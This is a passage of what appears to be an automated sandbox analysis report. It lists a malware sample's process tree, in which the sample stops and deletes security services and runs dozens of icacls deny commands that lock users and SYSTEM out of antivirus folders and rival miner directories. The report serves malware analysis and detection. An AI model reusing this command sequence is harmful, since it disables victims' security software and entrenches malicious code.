    - Launches sc.exe
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop crmsvc
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\sc.exe
    sc stop crmsvc
    3⤵
    - Launches sc.exe
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:4372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:3784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)
  2⤵
  PID:516
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\ProgramData\olly.exe /deny Admin:(F)
    3⤵
    PID:4880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)
  2⤵
  PID:3728
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\ProgramData\Iostream.exe /deny Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:8
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)
  2⤵
  PID:1728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)
  2⤵
  PID:3276
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)
    3⤵
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)
  2⤵
  PID:4336
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)
  2⤵
  PID:4620
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)
    3⤵
    PID:2156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2396
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3052
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:3624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:3728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:2400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1192
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4368
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2404
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:4824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3992
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:960
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2448
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:940
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1760
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:3440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5056
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:2816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:856
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:3100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5096
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
  2⤵
  PID:956
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:3216
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:404
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4420
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
    3⤵
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
  2⤵
  PID:3728
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4624
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
  2⤵
  PID:904
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
    3⤵
    PID:2608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4400
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
  2⤵
  PID:760
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4696
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1580
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)
  2⤵
  PID:876
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3240
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5072
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2816
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windowsdata /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2052
- - C:\Windows\SysWOW64\icacls.exe
    icacls D:\Windowsdata /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4688
- - C:\Windows\SysWOW64\icacls.exe
    icacls E:\Windowsdata /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4800
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\icacls.exe
    icacls K:\Windowsdata /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3600
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\disk /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Logs /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\windows\min /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:3752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5016
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2888
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:2812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4988
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4636
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)
  2⤵
  PID:876
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:2892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3784
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4944
